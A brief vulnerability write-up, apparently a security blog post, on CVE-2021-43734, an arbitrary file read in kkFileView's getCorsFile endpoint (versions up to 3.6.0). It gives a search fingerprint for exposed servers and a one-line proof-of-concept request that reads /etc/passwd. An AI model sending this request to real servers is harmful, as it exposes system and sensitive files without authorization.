Kkfileview Getcorsfile Arbitrary File Reading Vulnerability Cve 2021 43734
Kkfileview Getcorsfile Arbitrary File Reading Vulnerability Cve 2021 43734
kkFileView getCorsFile arbitrary file reading vulnerability CVE-2021-43734
Vulnerability Description
There is a vulnerability to read any file in the kkFileView getCorsFile version 3.6.0. The attacker can obtain any file in the server and obtain sensitive information from the server through the vulnerability.
Vulnerability Impact
kkFileView getCorsFile <= 3.6.0
Network surveying and mapping
body=”kkFileView”
Vulnerability reappears
Main page
Verify POC
1
/getCorsFile?urlPath=file:///etc/passwd
This post is licensed under CC BY 4.0 by the author.